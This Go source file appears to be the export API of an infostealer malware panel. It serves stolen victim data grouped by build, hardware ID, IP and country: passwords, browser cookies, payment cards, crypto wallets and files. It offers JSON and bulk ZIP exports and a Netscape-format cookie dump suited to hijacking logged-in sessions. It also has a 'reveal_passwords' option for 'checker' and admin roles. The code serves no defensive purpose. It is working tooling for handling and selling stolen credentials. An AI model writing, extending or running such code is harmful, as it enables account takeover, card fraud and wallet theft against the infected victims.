package api

import (
	"archive/zip"
	"bytes"
	"database/sql"
	"encoding/json"
	"net/http"

	"github.com/go-chi/chi/v5"
	"zialfi-panel/internal/db"
)

type ExportHandler struct {
	db *sql.DB
	provider     db.ProviderType
}

func NewExportHandler(db *sql.DB, provider db.ProviderType) *ExportHandler {
	return &ExportHandler{db: db, provider: provider}
}

func (h *ExportHandler) ExportSession(w http.ResponseWriter, r *http.Request) {
	id := chi.URLParam(r, "id")

	if r.URL.Query().Get("format") == "netscape" {
		h.exportNetscape(w, r)
		return
	}

	claims, ok := getClaims(r)
	if !ok {
		writeError(w, http.StatusUnauthorized, "authentication required")
		return
	}

	// Check session lock — hide sensitive data if locked by another
	var lockedBy string
	locked := db.QueryRow(h.db, h.provider, "SELECT locked_by FROM session_locks WHERE session_id = ?", id).Scan(&lockedBy) == nil
	if locked && lockedBy != claims.UserID && claims.Role != "admin" {
		writeError(w, http.StatusForbidden, "session is locked by another user")
		return
	}

	reveal := r.URL.Query().Get("reveal_passwords") == "true"
	if reveal {
		if claims.Role != "admin" && claims.Role != "checker" {
			reveal = false
		}
	}

	var s struct {
		ID          string
		BuildID     string
		Hwid        string
		Os          string
		Username    string
		Ip          string
		CountryCode string
		CreatedAt   string
	}
	err := db.QueryRow(h.db, h.provider, `
		SELECT id, build_id, hwid, os, username, ip, country_code, created_at
		FROM sessions WHERE id = ?`, id).Scan(
		&s.ID, &s.BuildID, &s.Hwid, &s.Os, &s.Username,
		&s.Ip, &s.CountryCode, &s.CreatedAt,
	)
	if err == sql.ErrNoRows {
		writeError(w, http.StatusNotFound, "session not found")
		return
	}
	if err != nil {
		writeError(w, http.StatusInternalServerError, "failed to fetch session")
		return
	}

	if !sessionOwnedBy(h.db, r, id) {
		writeError(w, http.StatusForbidden, "access denied")
		return
	}

	passwords := queryPasswords(h.db, id)
	if !reveal {
		for i := range passwords {
			passwords[i].PasswordValue = "[MASKED]"
		}
	}

	resp := SessionDetailResponse{
		ID:          s.ID,
		BuildID:     s.BuildID,
		Hwid:        s.Hwid,
		Os:          s.Os,
		Username:    s.Username,
		Ip:          s.Ip,
		CountryCode: s.CountryCode,
		CreatedAt:   s.CreatedAt,
		Passwords:   passwords,
		Cookies:     queryCookies(h.db, id),
		Cards:       queryCards(h.db, id),
		Wallets:     queryWalletsWithIcons(h.db, id),
		Files:       queryFiles(h.db, id),
		SystemInfo:  querySystemInfo(h.db, id),
	}

	writeJSON(w, http.StatusOK, resp)
}

func (h *ExportHandler) exportNetscape(w http.ResponseWriter, r *http.Request) {
	sessionID := chi.URLParam(r, "id")

	claims, ok := getClaims(r)
	if !ok {
		writeError(w, http.StatusUnauthorized, "authentication required")
		return
	}

	var lockedBy string
	locked := db.QueryRow(h.db, h.provider, "SELECT locked_by FROM session_locks WHERE session_id = ?", sessionID).Scan(&lockedBy) == nil
	if locked && lockedBy != claims.UserID && claims.Role != "admin" {
		writeError(w, http.StatusForbidden, "session is locked by another user")
		return
	}

	var exists bool
	err := db.QueryRow(h.db, h.provider, "SELECT EXISTS(SELECT 1 FROM sessions WHERE id = ?)", sessionID).Scan(&exists)
	if err != nil || !exists {
		writeError(w, http.StatusNotFound, "session not found")
		return
	}

	if !sessionOwnedBy(h.db, r, sessionID) {
		writeError(w, http.StatusForbidden, "access denied")
		return
	}

	cookies := queryCookies(h.db, sessionID)

	w.Header().Set("Content-Type", "text/plain")
	w.Header().Set("Content-Disposition", "attachment; filename=cookies_"+sessionID+".txt")
	w.WriteHeader(http.StatusOK)

	w.Write([]byte("# Netscape HTTP Cookie File\n"))
	w.Write([]byte("# https://curl.se/rfc/cookie_spec.html\n"))
	w.Write([]byte("# This file was auto-generated by Mirage Panel\n\n"))

	for _, c := range cookies {
		domain := c.Domain
		if domain != "" && domain[0] != '.' {
			domain = "." + domain
		}
		if domain == "" {
			continue
		}

		path := c.Path
		if path == "" {
			path = "/"
		}

		name := c.Name
		value := c.Value

		w.Write([]byte(domain + "\tTRUE\t" + path + "\tFALSE\t0\t" + name + "\t" + value + "\n"))
	}
}

func (h *ExportHandler) ExportBulk(w http.ResponseWriter, r *http.Request) {
	claims, ok := getClaims(r)
	if !ok {
		writeError(w, http.StatusUnauthorized, "authentication required")
		return
	}

	var req struct {
		IDs []string `json:"ids"`
	}
	if err := json.NewDecoder(r.Body).Decode(&req); err != nil {
		writeError(w, http.StatusBadRequest, "invalid JSON")
		return
	}
	if len(req.IDs) == 0 {
		writeError(w, http.StatusBadRequest, "ids required")
		return
	}

	var buf bytes.Buffer
	zw := zip.NewWriter(&buf)

	for _, id := range req.IDs {
		if !sessionOwnedBy(h.db, r, id) {
			continue
		}

		var lockedBy string
		locked := db.QueryRow(h.db, h.provider, "SELECT locked_by FROM session_locks WHERE session_id = ?", id).Scan(&lockedBy) == nil
		if locked && lockedBy != claims.UserID && claims.Role != "admin" {
			continue
		}

		resp := SessionDetailResponse{
			Passwords:  queryPasswords(h.db, id),
			Cookies:    queryCookies(h.db, id),
			Cards:      queryCards(h.db, id),
			Wallets:    queryWalletsWithIcons(h.db, id),
			Files:      queryFiles(h.db, id),
			SystemInfo: querySystemInfo(h.db, id),
		}

		var s struct {
			ID, BuildID, Hwid, Os, Username, Ip, CountryCode, CreatedAt string
		}
		err := db.QueryRow(h.db, h.provider, `
			SELECT id, build_id, hwid, os, username, ip, country_code, created_at
			FROM sessions WHERE id = ?`, id).Scan(
			&s.ID, &s.BuildID, &s.Hwid, &s.Os, &s.Username,
			&s.Ip, &s.CountryCode, &s.CreatedAt,
		)
		if err != nil {
			continue
		}
		resp.ID = s.ID
		resp.BuildID = s.BuildID
		resp.Hwid = s.Hwid
		resp.Os = s.Os
		resp.Username = s.Username
		resp.Ip = s.Ip
		resp.CountryCode = s.CountryCode
		resp.CreatedAt = s.CreatedAt

		data, err := json.Marshal(resp)
		if err != nil {
			continue
		}

		f, err := zw.Create(id + ".json")
		if err != nil {
			continue
		}
		if _, err := f.Write(data); err != nil {
			continue
		}
	}

	zw.Close()

	w.Header().Set("Content-Type", "application/zip")
	w.Header().Set("Content-Disposition", "attachment; filename=export.zip")
	w.WriteHeader(http.StatusOK)
	w.Write(buf.Bytes())
}
